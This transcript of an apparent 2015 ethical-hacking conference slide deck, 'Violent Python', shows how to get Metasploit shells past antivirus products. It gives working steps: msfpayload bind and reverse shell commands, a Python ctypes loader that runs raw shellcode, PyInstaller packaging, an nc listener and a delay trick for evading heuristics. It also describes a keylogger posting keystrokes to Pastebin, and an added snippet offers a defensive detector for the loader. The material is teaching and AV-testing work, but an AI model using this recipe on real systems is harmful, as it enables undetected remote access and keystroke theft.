Violent Python MPICT Winter - PowerPoint Presentation

mercynaybor
Uploaded On 2020-06-23


Presentation Transcript

Slide1

Violent Python
MPICT Winter 2015 ICT Educator Conference
San Francisco
Mon, Jan 5 2015

Slide2

Bio

Slide3

CNIT 124
Advanced Ethical Hacking

Slide4

Violent Python
Good coding principles
Exception handling
Modular design
Optimization
Commenting
Flow charts
FORGET THEM ALL

Slide5

Violent Python
We are hackers
We are here to BREAK STUFF
It should be fast and easy for a complete novice to hack together a simple script to do something fun!

Slide6

Slide7

Slide8

Slide9

Projects

Slide10

Slide11

Antivirus
Ungh! Good God y'all...
What is it GOOD For?

Slide12

Slide13

Mikko Hypponen Video

Slide14

Metasploit Payloads

Slide15

Metasploit
Hundreds of payloads
The simplest one: bind_tcp
Listens on a TCP port for commands

Slide16

Simple Reverse Shell
One command to produce very simple Windows EXE malware

Slide17

Antivirus Catches It

Slide18

Norton v. Shell.exe

Slide19

Norton Identifies the Metasploit Packer

Slide20

VirusTotal: 37/49 Detections

Slide21

How to Become 007

Slide22

Slide23

Python v. AV
Round 1
shell_bind_tcp

Slide24

Export Metasploit Payloads to C

Slide25

Use Ctypes Python Library

Slide26

Compile it on Windows
Install these things, in order
Python 2.7
PyWin32
pip-Win
PyInstaller
This creates an EXE file that listens on a TCP port

Slide27

DEMO
On Kali
msfpayload windows/shell_bind_tcp C > foo
nano foo

Change top to
from ctypes import *
shellcode = (

Change bottom to
);
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()

Slide28

DEMO
On Windows, in pip-Win:
venv -c -i pyi-env-name
pyinstaller --onefile --noconsole foo
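
A source-level check a defender could run over Python scripts for the loader pattern in the demo above, written as an added example (not from the presentation): it flags any `cast()` of a value to a ctypes function type and notes when that value came from `create_string_buffer`. The function names, both sample strings and the placeholder payload are constructed for illustration.

```python
import ast

# ctypes factories that turn a raw address into something callable.
FUNC_FACTORIES = {"CFUNCTYPE", "WINFUNCTYPE", "PYFUNCTYPE"}

def _callee(node):
    """Name of the function a Call node invokes (handles cast and ctypes.cast)."""
    func = node.func
    return getattr(func, "attr", None) or getattr(func, "id", None)

def find_buffer_to_function_casts(source):
    """Return sorted (line, factory, from_string_buffer) for each data-to-code cast."""
    tree = ast.parse(source)
    # Names assigned from create_string_buffer(...): plain data buffers.
    buffers = set()
    for node in ast.walk(tree):
        if (isinstance(node, ast.Assign) and isinstance(node.value, ast.Call)
                and _callee(node.value) == "create_string_buffer"):
            buffers.update(t.id for t in node.targets if isinstance(t, ast.Name))
    findings = []
    for call in ast.walk(tree):
        if not isinstance(call, ast.Call) or _callee(call) != "cast" or len(call.args) != 2:
            continue
        src, target = call.args
        # Second argument built by a function-type factory means data becomes code.
        if isinstance(target, ast.Call) and _callee(target) in FUNC_FACTORIES:
            from_buffer = isinstance(src, ast.Name) and src.id in buffers
            findings.append((call.lineno, _callee(target), from_buffer))
    return sorted(findings)

# Constructed sample: the loader skeleton from the slides, payload replaced by a placeholder.
SAMPLE = '''from ctypes import *
shellcode = ("PLACEHOLDER")
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
'''

# Constructed benign use of cast(): pointer-to-data, not pointer-to-function.
BENIGN = '''from ctypes import *
buf = create_string_buffer(16)
ints = cast(buf, POINTER(c_int))
'''

if __name__ == "__main__":
    for line, factory, from_buffer in find_buffer_to_function_casts(SAMPLE):
        print("line %d: cast to %s, from string buffer: %s" % (line, factory, from_buffer))
```

The check only parses the source and never executes it, so it is safe to run over untrusted scripts.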

Slide29

VirusTotal: 1/50 Detection

Slide30

Norton Support
I Tweeted about this, and @NortonSupport replied
VirusTotal is not a fair test, because real installed Norton uses Heuristic Scanning
@NortonSupport gave me a link for a 30-day trial version :)

Slide31

Norton Wins!

Slide32

Kaspersky Wins!
Avast! doesn't detect it
Kaspersky detects it as HEUR:Trojan.Win32.Generic

Slide33

Python v. AV
Round 2
shell_bind_tcp
with a delay

Slide34

Slide35

Slide36

DEMO
On Kali
cp foo foo2
nano foo2
x=raw_input("Press Enter to continue")

On Windows, in pip-Win:
venv -c -i pyi-env-name
pyinstaller --onefile foo2

Slide37

Norton, Avast, & MSE Lose!

Slide38

Kaspersky Wins!

Slide39

Python v. AV
Round 3
shell_bind_tcp
in two stages
no delay

Slide40

Other AV
Tested on Mar 24, 2014 with a two-stage reverse shell and no time delay
All these failed
Norton
Nod32
Avast!
360 Internet Security
McAfee
Kaspersky

Slide41

Remember Mikko?

Slide42

F-Secure Wins!

Slide43

AV Challenge

Slide44

Posted April 3, 2014
No reply from AV vendors, but Norton improved its detection after that
Now a delay is required

Slide45

Python v. AV
Round 4
shell_bind_tcp
with a delay

Slide46

INSTRUCTIONS
On Kali
msfpayload windows/shell_reverse_tcp LHOST=192.168.119.252 C > rev
nano rev

Change top to
x=raw_input("Press Enter to continue")
from ctypes import *
shellcode = (

Change bottom to
);
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()

Slide47

INSTRUCTIONS
On Windows, in pip-Win:
venv -c -i pyi-env-name
pyinstaller --onefile rev

On Kali
nc -lp 4444

Slide48

Norton Loses

Slide49

Kaspersky Wins

Slide50

Advanced Malware Protection

Slide51

ty @ChrisAbdalla_1 from HP ESP TippingPoint

Slide52

A friend in the financial industry tested Evil.exe on a system protected by FireEye
FireEye gives no alerts and lets it post keystrokes right to Pastebin

Slide53

Python Keylogger

Slide54

Google "Python Keylogger"
I used this one from 4 years ago

Slide55

Post Keystrokes to Pastebin

Slide56

Problem
Pastebin busted me for making too many pastes in a 24-hour period
So I wrote my own Pastebin imitation

Slide57

Kaspersky & Avast! LOSE

Slide58

Norton WINS!

Slide59

But just add a delay...

Slide60

F-Secure LOSES!

Slide61

PRODUCT ANNOUNCEMENT!

Slide62

Ultra-Advanced APT Tool
samsclass.info/evil.exe

Slide63

Slide64

UNSTOPPABLE
None of these products stop it
Norton
McAfee
Kaspersky
Nod32
F-Secure
Avast!
Microsoft Security Essentials

Slide65

Slide66

Slide67